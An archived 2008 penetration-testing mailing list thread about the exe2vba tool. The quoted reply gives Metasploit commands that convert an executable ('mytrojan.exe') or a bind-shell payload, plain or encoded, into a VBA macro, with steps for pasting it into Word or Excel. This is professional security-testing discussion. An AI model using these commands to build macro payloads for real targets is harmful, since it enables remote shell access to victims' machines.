Penetration Testing mailing list archives
Re: Exe2vba - Anybody still have this?
From: "Ulisses Castro (thebug)" <uss.thebug () gmail com>
Date: Mon, 17 Nov 2008 16:24:59 -0200
Moore, I need some change to make this work on winxp pt-br version? thx! Ulisses On Wed, Nov 12, 2008 at 5:21 PM, H D Moore <sflist () digitaloffense net> wrote:
Hi Joseph, I added this to Metasploit. You can use the VBA generator in a few different ways: 1) Convert an EXE to a VBA script (works on Word/Excel automatically): $ ruby msf3/tools/exe2vba.exe mytrojan.exe output.vba 2) Create a VBA script that runs a Metasploit payload $ ruby msf3/msfpayload windows/shell_bind_tcp LPORT=12345 V > output.vba 3) Create a VBA script that runs an encoded Metasploit payload $ ruby msf3/msfpayload windows/shell_bind_tcp LPORT=12345 R | \ ruby msf3/msfencode -a x86 -b '' -t vba > output.vba To use the resulting VBA, open Word/Excel, go to Tools -> Macros -> Visual Basic Editor, paste in, save, and exit. Works pretty well here :-) You need the latest SVN of Metasploit 3.2 trunk: $ svn co http://metasploit.com/svn/framework3/trunk/ On Windows, follow this guide: - http://metasploit.com/dev/trac/wiki/Metasploit/Windows/Upgrade_to_SVN -HD On Tuesday 11 November 2008, Joseph McCray wrote:It used to be located at: http://www.priestmaster.org/tools.html I've been looking all over the web and really haven't been able to find this app anymore.------------------------------------------------------------------------ This list is sponsored by: Cenzic Security Trends Report from Cenzic Stay Ahead of the Hacker Curve! Get the latest Q2 2008 Trends Report now www.cenzic.com/landing/trends-report ------------------------------------------------------------------------
------------------------------------------------------------------------ This list is sponsored by: Cenzic Security Trends Report from Cenzic Stay Ahead of the Hacker Curve! Get the latest Q2 2008 Trends Report now www.cenzic.com/landing/trends-report ------------------------------------------------------------------------
Current thread:
- Exe2vba - Anybody still have this? Joseph McCray (Nov 11)
- Re: Exe2vba - Anybody still have this? Lucas Lyon (Nov 12)
- Re: Exe2vba - Anybody still have this? H D Moore (Nov 12)
- Re: Exe2vba - Anybody still have this? natron (Nov 17)
- RE: Exe2vba - Anybody still have this? Brett Moore (Nov 17)
- Re: Exe2vba - Anybody still have this? Ulisses Castro (thebug) (Nov 17)
- Re: Exe2vba - Anybody still have this? natron (Nov 17)
- <Possible follow-ups>
- Re: Exe2vba - Anybody still have this? infolookup (Nov 12)